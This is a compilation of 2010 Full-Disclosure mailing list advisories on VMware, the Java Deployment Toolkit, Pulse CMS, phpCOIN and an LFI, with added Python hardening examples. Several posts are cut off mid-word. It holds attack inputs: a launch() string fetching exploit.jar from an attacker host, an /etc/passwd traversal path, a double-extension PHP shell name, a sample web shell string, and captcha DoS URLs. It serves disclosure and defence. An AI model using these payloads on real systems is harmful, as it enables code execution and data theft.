[Full-disclosure] VMSA-2010-0007 VMware hosted products, vCenter Server and ESX patches resolve multiple security issues
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
                   VMware Security Advisory

Advisory ID:       VMSA-2010-0007
Synopsis:          VMware hosted products, vCenter Server and ESX patches
                   resolve multiple security issues
Issue date:        2010-04-09
Updated on:        2010-04-09 (initial release of advisory)
CVE numbers:       CVE-2010-1142 CVE-2010-1140 CVE-2009-2042 CVE-2009-1564
                   CVE-2009-1565 CVE-2009-3732 CVE-2009-3707 CVE-2010-1138
                   CVE-2010-1139 CVE-2010-1141
- ------------------------------------------------------------------------

1. Summary

   VMware hosted products, vCenter Server and ESX patches resolve
   multiple security issues.

2. Relevant releases

   VMware Workstation 7.0
   VMware Workstation 6.5.3 and earlier
   VMware Player 3.0
   VMware Player 2.5.3 and earlier
   VMware ACE 2.6
   VMware ACE 2.5.3 and earlier
   VMware Server 2.0.2 and earlier
   VMware Fusion 3.0
   VMware Fusion 2.0.6 and earlier
   VMware VIX API for Windows 1.6.x

   VMware ESXi 4.0 before patch ESXi400-201002402-BG
   VMware ESXi 3.5 before patch ESXe350-200912401-T-BG

   VMware ESX 4.0 without patches ESX400-201002401-BG, ESX400-200911223-UG
   VMware ESX 3.5 without patch ESX350-200912401-BG
   VMware ESX 3.0.3 without patch ESX303-201002203-UG
   VMware ESX 2.5.5 without Upgrade Patch 15

   Notes:
   Effective May 2010, VMware's patch and update release program during
   Extended Support will be continued with the condition that all
   subsequent patch and update releases will be based on the latest
   baseline release version as of May 2010 (i.e. ESX 3.0.3 Update 1,
   ESX 3.5 Update 5, and VirtualCenter 2.5 Update 6). Refer to section
   "End of Product Availability FAQs" at
   http://www.vmware.com/support/policies/lifecycle/vi/faq.html for
   details.

   Extended support for ESX 2.5.5 ends on 2010-06-15. Users should plan
   to upgrade to at least ESX 3.0.3 and preferably to the newest release
   available.

   Extended support for ESX 3.0.3 ends on 2011-12-10. Users should plan
   to upgrade to at least ESX 3.5 and preferably to the newest release
   available.

   End of General Support for VMware Workstation 6.x is 2011-04-27; users
   should plan to upgrade to the newest release available.

   End of General Support for VMware Server 2.0 is 2011-06-30; users
   should plan to upgrade to the newest release of either ESXi or VMware
   Player.

   Extended support for Virtual Center 2.0.2 is 2011-12-10; users should
   plan to upgrade to the newest release of vCenter Server.

3. Problem Description

 a. Windows-based VMware Tools Unsafe Library Loading vulnerability

   A vulnerability in the way VMware libraries are referenced allows for
   arbitrary code execution in the context of the logged on user. This
   vulnerability is present only on Windows Guest Operating Systems.

   In order for an attacker to exploit the vulnerability, the attacker
   would need to lure the user that is logged on to a Windows Guest
   Operating System to click on the attacker's file on a network share.
   This file could be in any file format. The attacker will need to have
   the ability to host their malicious files on a network share.

   VMware would like to thank Jure Skofic and Mitja Kolsek of ACROS
   Security (http://www.acrossecurity.com) for reporting this issue to
   us.

   The Common Vulnerabilities and Exposures project (cve.mitre.org) has
   assigned the name CVE-2010-1141 to this issue.

   Steps needed to remediate this vulnerability:

   Guest systems on VMware Workstation, Player, ACE, Server, Fusion
   - Install the remediated version of Workstation, Player, ACE, Server
     and Fusion.
   - Upgrade tools in the virtual machine (virtual machine users will be
     prompted to upgrade).

   Guest systems on ESX 4.0, 3.5, 3.0.3, 2.5.5, ESXi 4.0, 3.5
   - Install the relevant patches (see below for patch identifiers)
   - Manually upgrade tools in the virtual machine (virtual machine
     users will not be prompted to upgrade). Note that the VI Client
     will not show that the VMware Tools are out of date in the summary
     tab. Please see http://tinyurl.com/27mpjo page 80 for details.

   The following table lists what action remediates the vulnerability
   (column 4) if a solution is available. See above for remediation
   details.

   VMware         Product   Running   Replace with/
   Product        Version   on        Apply Patch
   =============  ========  ========  ===========================
   VirtualCenter  any       Windows   not affected

   Workstation    7.x       any       not affected
   Workstation    6.5.x     any       6.5.4 build 246459 or later

   Player         3.x       any       not affected
   Player         2.5.x     any       2.5.4 buil
[Full-disclosure] Java Deployment Toolkit Performs Insufficient Validation of Parameters
Java Deployment Toolkit Performs Insufficient Validation of Parameters
----------------------------------------------------------------------

Java Web Start (henceforth, jws) provides java developers with a way to let
users launch and install their applications using a URL to a Java Network
Launching Protocol (.jnlp) file (essentially some xml describing the
program).

Since Java 6 Update 10, Sun has distributed an NPAPI plugin and ActiveX
control called "Java Deployment Toolkit" to provide developers with a
simpler method of distributing their applications to end users. This
toolkit is installed by default with the JRE and marked safe for scripting.

The launch() method provided by the toolkit object accepts a URL string,
which it passes to the registered handler for JNLP files, which by default
is the javaws utility.

    $ cmd /c ver
    Microsoft Windows XP [Version 5.1.2600]
    $ java -version
    java version "1.6.0_19"
    Java(TM) SE Runtime Environment (build 1.6.0_19-b04)
    Java HotSpot(TM) Client VM (build 16.2-b04, mixed mode, sharing)
    $ cat /proc/registry/HKEY_LOCAL_MACHINE/SOFTWARE/Classes/JNLPFile/Shell/Open/Command/\@
    "C:\Program Files\Java\jre6\bin\javaws.exe" "%1"

The toolkit provides only minimal validation of the URL parameter, allowing
us to pass arbitrary parameters to the javaws utility, which provides
enough functionality via command line arguments to allow this error to be
exploited.

The simplicity with which this error can be discovered has convinced me
that releasing this document is in the best interest of everyone except
the vendor.

Affected Software
-----------------

All versions since Java SE 6 update 10 for Microsoft Windows are believed
to be affected by this vulnerability. Disabling the java plugin is not
sufficient to prevent exploitation, as the toolkit is installed
independently.

http://java.sun.com/javase/6/docs/technotes/guides/jweb/deployment_advice.html

I believe non-Windows installations are unaffected.

Consequences
------------

Exploitation of this issue is not terribly exciting, but is potentially of
high enough impact to merit explanation.

The javaws application supports the following command line parameters.

    $ javaws -help
    Usage:  javaws [run-options] <jnlp-file>
            javaws [control-options]

    where run-options include:
      -verbose              display additional output
      -offline              run the application in offline mode
      -system               run the application from the system cache only
      -Xnosplash            run without showing a splash screen
      -J<option>            supply option to the vm
      -wait                 start java process and wait for its exit

    control-options include:
      -viewer               show the cache viewer in the java control panel
      -uninstall            remove all applications from the cache
      -uninstall <jnlp-file>  remove the application from the cache
      -import [import-options] <jnlp-file>  import the application to the cache

    import-options include:
      -silent               import silently (with no user interface)
      -system               import application into the system cache
      -codebase <url>       retrieve resources from the given codebase
      -shortcut             install shortcuts as if user allowed prompt
      -association          install associations as if user allowed prompt

Perhaps the most interesting of these is -J, and the obvious attack is
simply to add -jar followed by an attacker controlled UNC path to the jvm
command line, which I've demonstrated below. Other attacks are clearly
possible, but this is sufficient to demonstrate the problem.

In order to trigger this attack in Internet Explorer, an attacker would use
a code sequence like this

    /* ... */
    var o = document.createElement("OBJECT");
    o.classid = "clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA";
    o.launch("http: -J-jar -J\\\\attacker.controlled\\exploit.jar none");
    /* ... */

Or, for Mozilla Firefox

    /* ... */
    var o = document.createElement("OBJECT");
    o.type = "application/npruntime-scriptable-plugin;deploymenttoolkit";
    document.body.appendChild(o);
    o.launch("http: -J-jar -J\\\\attacker.controlled\\exploit.jar none");
    /* ... */

Please note, at some point the registered MIME type was changed to
application/java-deployment-toolkit; please verify which type applies to
your users when verifying that any mitigation implemented has been effective
(the simplest way would be to look at the output of about:plugins on a
reference machine).

A harmless demonstration is provided at the URL below.

http://lock.cmpxchg8b.com/bb5eafbc6c6e67e11c4afc88b4e1dd22/testcase.html

Mitigation
----------

If you believe your users may be affected, you should consider applying one
of the workarounds described below as a matter of urgency.

- Internet Explorer users can be protected by temporarily setting the
  killbit on CAFEEFAC-DEC7-
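The post above describes the defect as "minimal validation" of a string that ends up on the javaws command line. The following is an added example, not code from the original post or from Sun's toolkit: it contrasts the kind of prefix check that lets the injected string through with a strict URL check, and shows what a handler that appends the string to its command line unquoted would see. The two sample strings are constructed here; the whitespace split is an approximation of argument handling, not the toolkit's actual code.

```python
import re
from urllib.parse import urlsplit

# Constructed sample launch strings: a legitimate JNLP URL and the shape of
# the injected string described above, which smuggles -J options to javaws.
GOOD_URL = "http://example.org/app/launch.jnlp"
BAD_URL = "http: -J-jar -J\\\\attacker.controlled\\exploit.jar none"


def naive_is_launch_url(s: str) -> bool:
    """The kind of check that lets the injection through: the value only
    has to look like it begins with an http URL."""
    return s.lower().startswith("http:")


def tokens_seen_by_handler(s: str) -> list:
    """Approximation (assumption, not the toolkit's code) of what a handler
    that appends the string to its command line unquoted would see:
    whitespace turns one 'URL' into several arguments."""
    return s.split()


def smuggled_jvm_options(s: str) -> list:
    """Any -J options such a handler would forward to the JVM."""
    return [t for t in tokens_seen_by_handler(s) if t.startswith("-J")]


_CTRL_OR_SPACE = re.compile(r"[\x00-\x20\x7f]")


def strict_is_launch_url(s: str) -> bool:
    """Accept only an absolute http(s) URL with a host and no whitespace or
    control characters, so the value can never carry extra arguments."""
    if _CTRL_OR_SPACE.search(s):
        return False
    try:
        parts = urlsplit(s)
    except ValueError:
        return False
    return parts.scheme in ("http", "https") and bool(parts.hostname)


if __name__ == "__main__":
    for u in (GOOD_URL, BAD_URL):
        print(repr(u))
        print("  naive check :", naive_is_launch_url(u))
        print("  strict check:", strict_is_launch_url(u))
        print("  -J options  :", smuggled_jvm_options(u))
```

The strict check rejects on any whitespace or control character before parsing, so a bypass of the URL parser alone is not enough; the naive check accepts anything with the right five-character prefix.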
Re: [Full-disclosure] Java Deployment Toolkit Performs InsufficientValidation of Parameters
jws seems to be one of those gifts that keeps on giving. I don't have
actual numbers, but it seems to me I see it mentioned regularly in their
vulnerability reports.

-----Original Message-----
From: full-disclosure-boun...@lists.grok.org.uk
[mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Tavis Ormandy
Sent: Friday, April 09, 2010 7:08 AM
To: full-disclosure@lists.grok.org.uk
Subject: [Full-disclosure] Java Deployment Toolkit Performs Insufficient
Validation of Parameters

[...]
[Full-disclosure] Secunia Research: Pulse CMS Arbitrary File Upload Vulnerability
======================================================================

                     Secunia Research 08/04/2010

          - Pulse CMS Arbitrary File Upload Vulnerability -

======================================================================
Table of Contents

Affected Software....................................................1
Severity.............................................................2
Vendor's Description of Software.....................................3
Description of Vulnerability.........................................4
Solution.............................................................5
Time Table...........................................................6
Credits..............................................................7
References...........................................................8
About Secunia........................................................9
Verification........................................................10

======================================================================
1) Affected Software

* Pulse CMS basic version 1.2.2 and 1.2.3

NOTE: Other versions may also be affected.

======================================================================
2) Severity

Rating: Moderately critical
Impact: System access
Where:  From remote

======================================================================
3) Vendor's Description of Software

"Pulse is a simple CMS designed for small websites. It enables you to
take an existing site and add content management in five minutes."

Product Link:
http://pulsecms.com/

======================================================================
4) Description of Vulnerability

Secunia Research has discovered a vulnerability in Pulse CMS, which can
be exploited by malicious users to compromise a vulnerable system.

An error in the validation of uploaded image files can be exploited to
upload files with an arbitrary extension to a folder within the web
root. This can be exploited to upload and execute arbitrary PHP code.

Successful exploitation requires authentication.

======================================================================
5) Solution

Partially fixed in version 1.2.4.

It can still be exploited to execute arbitrary PHP code by uploading a
malicious PHP script with multiple extensions (e.g. "shell.php.gif") if
Apache is not configured to handle the mime-type for media files with
an e.g. "gif" extension.

======================================================================
6) Time Table

19/03/2010 - Vendor notified.
19/03/2010 - Vendor response.
08/04/2010 - Public disclosure.

======================================================================
7) Credits

Discovered by Secunia Research.

======================================================================
8) References

The Common Vulnerabilities and Exposures (CVE) project has assigned
CVE-2010-0993 for the vulnerability.

======================================================================
9) About Secunia

Secunia offers vulnerability management solutions to corporate
customers with verified and reliable vulnerability intelligence
relevant to their specific system configuration:

http://secunia.com/advisories/business_solutions/

Secunia also provides a publicly accessible and comprehensive advisory
database as a service to the security community and private
individuals, who are interested in or concerned about IT-security.

http://secunia.com/advisories/

Secunia believes that it is important to support the community and to
do active vulnerability research in order to aid improving the security
and reliability of software in general:

http://secunia.com/secunia_research/

Secunia regularly hires new skilled team members. Check the URL below
to see currently vacant positions:

http://secunia.com/corporate/jobs/

Secunia offers a FREE mailing list called Secunia Security Advisories:

http://secunia.com/advisories/mailing_lists/

======================================================================
10) Verification

Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2010-47/

Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/

======================================================================

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
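The advisory's "Solution" section says the 1.2.4 fix is only partial because a name like "shell.php.gif" still gets through. The following is an added example, not Pulse CMS's code or Secunia's: it puts the last-extension-only check next to a hardened one that rejects an executable segment anywhere in the name, verifies the declared type against the content's magic bytes, and discards the client's filename in favour of a server-generated one with a single extension. The sample file contents and the list of executable segments are constructed here for illustration.

```python
import os
import secrets

# Constructed sample inputs: a minimal GIF header and a PHP payload an
# attacker would try to disguise with a double extension.
GIF_BYTES = b"GIF89a" + b"\x00" * 32
PHP_BYTES = b"<?php system($_GET['c']); ?>"

# Allowed upload types, each with the magic bytes its content must start with.
IMAGE_MAGIC = {
    "gif": (b"GIF87a", b"GIF89a"),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
}
# Extension segments that common Apache/mod_php setups treat as executable
# wherever they appear in the name (assumed list, extend per deployment).
EXECUTABLE_SEGMENTS = {"php", "php3", "php4", "php5", "phtml", "phar", "cgi", "pl"}


def last_extension_ok(filename: str) -> bool:
    """The shape of a partial fix: only the final extension is checked, so
    'shell.php.gif' passes and Apache may still hand it to mod_php."""
    return filename.rsplit(".", 1)[-1].lower() in IMAGE_MAGIC


def safe_upload_name(filename: str, data: bytes) -> str:
    """Hardened check. Raises ValueError unless the upload is acceptable and
    returns a server-chosen storage name carrying a single allowed extension."""
    base = os.path.basename(filename.replace("\\", "/"))
    segments = base.lower().split(".")
    if len(segments) < 2 or not segments[0] or not segments[-1]:
        raise ValueError("missing or empty extension")
    ext = segments[-1]
    if ext not in IMAGE_MAGIC:
        raise ValueError(f"extension {ext!r} not allowed")
    # Reject executable segments anywhere in the name, not only at the end.
    if EXECUTABLE_SEGMENTS & set(segments[1:-1]):
        raise ValueError("executable extension segment in filename")
    # The declared type must agree with the content's magic bytes.
    if not data.startswith(IMAGE_MAGIC[ext]):
        raise ValueError("content does not match declared image type")
    # Discard the client's name entirely: a random name with one extension
    # is the only dot-suffix the web server will ever see.
    return f"{secrets.token_hex(8)}.{ext}"


def is_upload_accepted(filename: str, data: bytes) -> bool:
    """Boolean wrapper around safe_upload_name for policy checks."""
    try:
        safe_upload_name(filename, data)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    for name, data in (("photo.gif", GIF_BYTES), ("shell.php.gif", GIF_BYTES),
                       ("shell.php", PHP_BYTES), ("fake.gif", PHP_BYTES)):
        print(f"{name:15} last-ext-only={last_extension_ok(name)!s:5} "
              f"hardened={is_upload_accepted(name, data)}")
```

Renaming on the server is the part that makes the Apache multiple-extension behaviour irrelevant; the magic-byte check is a second, independent layer, and the upload directory should in any case be served with script execution disabled.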
[Full-disclosure] Secunia Research: Pulse CMS Cross-Site Request Forgery
======================================================================

                     Secunia Research 08/04/2010

               - Pulse CMS Cross-Site Request Forgery -

======================================================================
Table of Contents

Affected Software....................................................1
Severity.............................................................2
Vendor's Description of Software.....................................3
Description of Vulnerability.........................................4
Solution.............................................................5
Time Table...........................................................6
Credits..............................................................7
References...........................................................8
About Secunia........................................................9
Verification........................................................10

======================================================================
1) Affected Software

* Pulse CMS basic version 1.2.2 and 1.2.3

NOTE: Other versions may also be affected.

======================================================================
2) Severity

Rating: Less critical
Impact: Cross-site scripting
Where:  From remote

======================================================================
3) Vendor's Description of Software

"Pulse is a simple CMS designed for small websites. It enables you to
take an existing site and add content management in five minutes."

Product Link:
http://pulsecms.com/

======================================================================
4) Description of Vulnerability

Secunia Research has discovered a vulnerability in Pulse CMS, which can
be exploited by malicious people to conduct cross-site scripting
attacks.

The application allows users to perform certain actions via HTTP
requests without performing any validity checks to verify the requests.
This can be exploited to e.g. upload or delete image files and create
blocks if a logged-in user visits a malicious web site.

======================================================================
5) Solution

Update to version 1.2.4.

======================================================================
6) Time Table

19/03/2010 - Vendor notified.
19/03/2010 - Vendor response.
08/04/2010 - Public disclosure.

======================================================================
7) Credits

Discovered by Secunia Research.

======================================================================
8) References

The Common Vulnerabilities and Exposures (CVE) project has assigned
CVE-2010-0992 for the vulnerability.

======================================================================
9) About Secunia

Secunia offers vulnerability management solutions to corporate
customers with verified and reliable vulnerability intelligence
relevant to their specific system configuration:

http://secunia.com/advisories/business_solutions/

Secunia also provides a publicly accessible and comprehensive advisory
database as a service to the security community and private
individuals, who are interested in or concerned about IT-security.

http://secunia.com/advisories/

Secunia believes that it is important to support the community and to
do active vulnerability research in order to aid improving the security
and reliability of software in general:

http://secunia.com/secunia_research/

Secunia regularly hires new skilled team members. Check the URL below
to see currently vacant positions:

http://secunia.com/corporate/jobs/

Secunia offers a FREE mailing list called Secunia Security Advisories:

http://secunia.com/advisories/mailing_lists/

======================================================================
10) Verification

Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2010-46/

Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/

======================================================================
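The weakness described in section 4 is that state-changing requests (upload, delete, create block) carry nothing a forging site could not also supply, since the browser attaches the victim's cookies automatically. The following is an added example of the standard fix, not Pulse CMS's code: a per-session token derived with an HMAC that a page on another origin cannot read, checked in constant time on every POST, with GET refused outright for state changes. The request bodies, field names and session id are constructed here and are not Pulse CMS's own.

```python
import hashlib
import hmac
import secrets
from urllib.parse import parse_qs

# Per-deployment secret; constructed here, in practice loaded from config.
SERVER_SECRET = secrets.token_bytes(32)


def csrf_token(session_id: str) -> str:
    """Token bound to the session: HMAC(secret, session_id). A page on
    another origin can make the browser send a request with the victim's
    cookies, but it cannot read this value, so it cannot put it in the
    form body. Being derived, it needs no per-form server-side storage."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def is_state_change_allowed(session_id: str, method: str, body: str) -> bool:
    """Gate every state-changing action (upload, delete, create block)."""
    if method.upper() != "POST":
        return False  # a GET must never change state; it is trivially forged
    supplied = parse_qs(body).get("csrf_token", [""])[0]
    # Constant-time comparison so a wrong token leaks nothing by timing.
    return hmac.compare_digest(supplied, csrf_token(session_id))


# Constructed requests; the field names are hypothetical, not Pulse CMS's own.
SESSION = "sess-7f3a"
FORGED_BODY = "action=delete&file=hero.jpg"          # what a malicious site can send
LEGIT_BODY = f"action=delete&file=hero.jpg&csrf_token={csrf_token(SESSION)}"


if __name__ == "__main__":
    print("forged POST :", is_state_change_allowed(SESSION, "POST", FORGED_BODY))
    print("legit  POST :", is_state_change_allowed(SESSION, "POST", LEGIT_BODY))
    print("legit  GET  :", is_state_change_allowed(SESSION, "GET", LEGIT_BODY))
```

The token must be rendered into each form by the server and never accepted from a cookie or query string, otherwise the forging page gets it back for free.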
[Full-disclosure] List Charter
[Full-Disclosure] Mailing List Charter
John Cartwright

- Introduction & Purpose -

This document serves as a charter for the [Full-Disclosure] mailing list
hosted at lists.grok.org.uk.

The list was created on 9th July 2002 by Len Rose, and is primarily
concerned with security issues and their discussion. The list is
administered by John Cartwright.

The Full-Disclosure list is hosted and sponsored by Secunia.

- Subscription Information -

Subscription/unsubscription may be performed via the HTTP interface
located at http://lists.grok.org.uk/mailman/listinfo/full-disclosure.

Alternatively, commands may be emailed to
full-disclosure-requ...@lists.grok.org.uk; send the word 'help' in either
the message subject or body for details.

- Moderation & Management -

The [Full-Disclosure] list is unmoderated. Typically posting will be
restricted to members only, however the administrators may choose to
accept submissions from non-members based on individual merit and
relevance.

It is expected that the list will be largely self-policing, however in
special circumstances (e.g. spamming, misappropriation) offending members
may be removed from the list by the management.

An archive of postings is available at
http://lists.grok.org.uk/pipermail/full-disclosure/.

- Acceptable Content -

Any information pertaining to vulnerabilities is acceptable, for instance
announcement and discussion thereof, exploit techniques and code, related
tools and papers, and other useful information.

Gratuitous advertisement, product placement, or self-promotion is
forbidden. Disagreements, flames, arguments, and off-topic discussion
should be taken off-list wherever possible.

Humour is acceptable in moderation, providing it is inoffensive. Politics
should be avoided at all costs.

Members are reminded that due to the open nature of the list, they should
use discretion in executing any tools or code distributed via this list.

- Posting Guidelines -

The primary language of this list is English. Members are expected to
maintain a reasonable standard of netiquette when posting to the list.

Quoting should not exceed that which is necessary to convey context; this
is especially relevant to members subscribed to the digested version of
the list.

The use of HTML is discouraged, but not forbidden. Signatures will
preferably be short and to the point, and those containing 'disclaimers'
should be avoided where possible.

Attachments may be included if relevant or necessary (e.g. PGP or S/MIME
signatures, proof-of-concept code, etc) but must not be active (in the
case of a worm, for example) or malicious to the recipient.

Vacation messages should be carefully configured to avoid replying to list
postings. Offenders will be excluded from the mailing list until the
problem is corrected.

Members may post to the list by emailing full-disclos...@lists.grok.org.uk.
Do not send subscription/unsubscription mails to this address; use the
-request address mentioned above.

- Charter Additions/Changes -

The list charter will be published at
http://lists.grok.org.uk/full-disclosure-charter.html. In addition, the
charter will be posted monthly to the list by the management.

Alterations will be made after consultation with list members and a
consensus has been reached.
[Full-disclosure] Vulnerabilities in phpCOIN
Hello Full-Disclosure!

I want to warn you about security vulnerabilities in system phpCOIN.

-------------------------
Advisory: Vulnerabilities in phpCOIN
-------------------------
URL: http://websecurity.com.ua/4090/
-------------------------
Affected products: phpCOIN 1.6.5 and previous versions.
-------------------------
Timeline:

17.03.2010 - found vulnerabilities.
01.04.2010 - disclosed at my site.
02.04.2010 - informed developers.
-------------------------
Details:

These are Insufficient Anti-automation and Denial of Service
vulnerabilities.

The vulnerabilities exist in captcha script CaptchaSecurityImages.php,
which is used in this system. I already reported vulnerabilities in
CaptchaSecurityImages (http://websecurity.com.ua/4043/).

Insufficient Anti-automation:

http://site/coin_addons/captcha/CaptchaSecurityImages.php?width=150&height=100&characters=2

Captcha bypass is possible via half-automated or automated (with using of
OCR) methods, which were mentioned before (http://websecurity.com.ua/4043/).

DoS:

http://site/coin_addons/captcha/CaptchaSecurityImages.php?width=1000&height=9000

With setting of large values of width and height it's possible to create
large load at the server.

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
Re: [Full-disclosure] Vulnerabilities in phpCOIN
2010/4/9 MustLive :
> Hello Full-Disclosure!
>

Quoting the list charter: "Gratuitous advertisement, product placement, or
self-promotion is forbidden."

And where's the point in reporting several projects that use a -say-
library which has a reported problem? (I mean, you've sent quite the same
mail with a different software to bugtraq, today.)

The whole point of your "advisories" is self promotion and promotion of
your website.

> I want to warn you about security vulnerabilities in system phpCOIN.
>
> -
> Advisory: Vulnerabilities in phpCOIN
> -
> URL: http://websecurity.com.ua/4090/
> -
> Affected products: phpCOIN 1.6.5 and previous versions.
> -
> Timeline:
> 17.03.2010 - found vulnerabilities.
> 01.04.2010 - disclosed at my site.
> 02.04.2010 - informed developers.
> [...]
Re: [Full-disclosure] Vulnerabilities in phpCOIN
On Fri, 09 Apr 2010 15:49:58 +0200, "Jan G.B." said:

> And where's the point in reporting several projects that use a -say-
> library which has a reported problem? (I mean, you've send quite the
> same mail with a different software to bugtraq, today.)

A few years ago, a rather nasty vulnerability was found in the zlib
compression library. We then saw a whole raft of advisories for things
that included the zlib libraries, because often the package shipped with
a private copy of zlib so patching the system zlib did *not* actually
fix the problem for the zlib-using package.

And quite frankly, if it's a very low-level package, the average system
admin may not even *realize* that his very important MobyFoo package that
he remembers uses something called FooBar (or at least he remembers MobyFoo
wanting FooBar when he installed it 3 years ago), and the year after that,
FooBar started using QuuxBaz, which (a) the sysadmin didn't even know was
installed on his box, and (b) has a security hole.

You think I'm kidding? Even *after* some vigorous pruning, my Fedora laptop
has 1,782 RPMs installed - back around Red Hat 9 it was more like 600. Lotta
software bloat going on, and most sysadmins don't have the combo of time and
clue to fight it. For instance, it's a losing battle to keep Bluetooth
software off this laptop, even though it doesn't *have* Bluetooth hardware,
because more and more packages link in Bluetooth "in case you have it".

And not one of those package developers understands the concept of a linker
"weak reference". Argh.
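The reply above makes the point that a system-wide zlib patch does nothing for a package carrying its own private copy, and that the admin often does not know such a copy exists. The following is an added example, not from the poster: a scanner that finds bundled zlib copies by the version string zlib compiles into its own deflate/inflate objects, and reports the ones older than a given fixed version. The install tree it walks is constructed in a temporary directory, with file contents (and the MobyFoo/QuuxBaz names borrowed from the reply) made up for the demonstration; the version threshold is a parameter, not a claim about any particular zlib advisory.

```python
import os
import re
import tempfile

# zlib compiles strings of the form " deflate 1.2.3 Copyright ..." and
# " inflate 1.2.3 Copyright ..." into deflate.c and inflate.c, so a private
# copy linked into another binary is findable without package metadata.
ZLIB_MARK = re.compile(rb"(deflate|inflate) (\d+\.\d+(?:\.\d+)?) Copyright")
OVERLAP = 64  # longer than any marker, so one spanning two reads is not lost


def version_tuple(v: str) -> tuple:
    return tuple(int(x) for x in v.split("."))


def scan_file(path: str, chunk: int = 1 << 20) -> set:
    """Return the set of zlib version strings embedded in one file."""
    found, tail = set(), b""
    with open(path, "rb") as f:
        while True:
            buf = f.read(chunk)
            if not buf:
                break
            data = tail + buf
            found.update(m.group(2).decode() for m in ZLIB_MARK.finditer(data))
            tail = data[-OVERLAP:]
    return found


def find_stale_zlib(root: str, fixed_in: str) -> dict:
    """Map path -> embedded zlib versions older than `fixed_in` under `root`."""
    threshold = version_tuple(fixed_in)
    hits = {}
    for dirpath, _, names in os.walk(root):
        for n in names:
            p = os.path.join(dirpath, n)
            try:
                stale = {v for v in scan_file(p) if version_tuple(v) < threshold}
            except OSError:
                continue  # unreadable or vanished file; keep walking
            if stale:
                hits[p] = stale
    return hits


def stale_names(root: str, fixed_in: str) -> set:
    """Basenames of the files find_stale_zlib flags, for quick reporting."""
    return {os.path.basename(p) for p in find_stale_zlib(root, fixed_in)}


def make_sample_tree():
    """Constructed stand-in for an install tree: one binary bundling an old
    zlib, one bundling a newer one, one with no zlib at all. Returns the
    root and a name -> path map."""
    root = tempfile.mkdtemp()
    samples = {
        "mobyfoo": b"\x7fELF..." + b" deflate 1.2.1 Copyright 1995-2003 Jean-loup Gailly " + b"\x00" * 16,
        "quuxbaz": b"MZ..." + b" inflate 1.2.11 Copyright 1995-2017 Mark Adler " + b"\x00" * 16,
        "plain": b"no compression library here",
    }
    paths = {}
    for name, blob in samples.items():
        paths[name] = os.path.join(root, name)
        with open(paths[name], "wb") as f:
            f.write(blob)
    return root, paths


if __name__ == "__main__":
    root, _ = make_sample_tree()
    for path, versions in find_stale_zlib(root, "1.2.3").items():
        print(f"{path}: bundled zlib {sorted(versions)} older than 1.2.3")
```

Run against real directories such as /usr/lib, /opt and vendor install trees; a static copy shows up in the main executable or a private .so, which is exactly the case the system package manager cannot see.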
Re: [Full-disclosure] Vulnerabilities in phpCOIN
2010/4/9 :
> On Fri, 09 Apr 2010 15:49:58 +0200, "Jan G.B." said:
>
>> And where's the point in reporting several projects that use a -say-
>> library which has a reported problem? (I mean, you've send quite the
>> same mail with a different software to bugtraq, today.)
>
> A few years ago, a rather nasty vulnerability was found in the zlib
> compression library. We then saw a whole raft of advisories for things
> that included the zlib libraries, because often the package shipped with
> a private copy of zlib so patching the system zlib did *not* actually
> fix the problem for the zlib-using package.
>
> [...]
>
> And not one of those package developers understands the concept of a linker
> "weak reference". Argh.
>

You're right. But the target of these advisories seems to be to get as
many visitors as possible to that site and not to inform the developers
(see dates).

Regards
[Full-disclosure] LFI In Multi Profit Websites
Local File Inclusion (LFI) in Multi Profit Websites

Multi Profit Websites is a commercial script that is running on multiple
domains and they claim that this script earns money for the owner.

Vulnerability: Local File Inclusion via URL, which can be reproduced by

domain/page.php?id=../../../../../../etc/passwd

Reported : 1st april 2009
Fixed    : --

Credits,
H4CK3R Crew
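The post above gives the classic shape of a local file inclusion: a request parameter joined straight onto an include path. The following is an added example, not the script's code or the poster's: it shows where the vulnerable join ends up for the reported payload, and beside it a resolver with two independent layers, an allow-list on the page token and a realpath containment check, so that encoded dots, null bytes or a bypass of one layer still fail the other. The site layout and page names are constructed in a temporary directory; decoding the id once more inside the resolver is a defensive assumption about upstream handling, not a description of the script.

```python
import os
import re
import tempfile
from urllib.parse import unquote

PAGE_ID = re.compile(r"[a-z0-9_-]{1,32}")


def make_site() -> str:
    """Constructed stand-in for the site: pages live in one directory."""
    root = tempfile.mkdtemp()
    pages = os.path.join(root, "pages")
    os.mkdir(pages)
    for name in ("home", "about"):
        with open(os.path.join(pages, name + ".php"), "w") as f:
            f.write(f"<h1>{name}</h1>")
    return root


def vulnerable_resolve(root: str, page_id: str) -> str:
    """The pattern behind the report: the id is joined straight onto the
    include path, so '../' sequences walk out of the web root."""
    return os.path.normpath(os.path.join(root, "pages", page_id))


def resolve_page(root: str, page_id: str):
    """Return the file to include for ?id=..., or None if the request is
    unsafe. Two independent layers: a strict allow-list on the token, then a
    realpath containment check, so a bypass of one still fails the other."""
    page_id = unquote(page_id)  # treat %2e%2e and %00 the same as raw bytes
    if "\x00" in page_id or not PAGE_ID.fullmatch(page_id):
        return None
    pages = os.path.realpath(os.path.join(root, "pages"))
    candidate = os.path.realpath(os.path.join(pages, page_id + ".php"))
    # Containment: the resolved path must still sit under the pages directory.
    if os.path.commonpath([pages, candidate]) != pages:
        return None
    return candidate if os.path.isfile(candidate) else None


if __name__ == "__main__":
    root = make_site()
    payload = "../../../../../../etc/passwd"
    print("vulnerable ->", vulnerable_resolve(root, payload))
    print("hardened   ->", resolve_page(root, payload))
    print("hardened   ->", resolve_page(root, "home"))
```

The allow-list alone would be enough for this payload; the containment check is there for the day someone widens the pattern or adds a second include path.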
Re: [Full-disclosure] Vulnerabilities in phpCOIN
I think Universities should rethink their Software Development courses...

Valdis has got a very strong point. Here's my own.

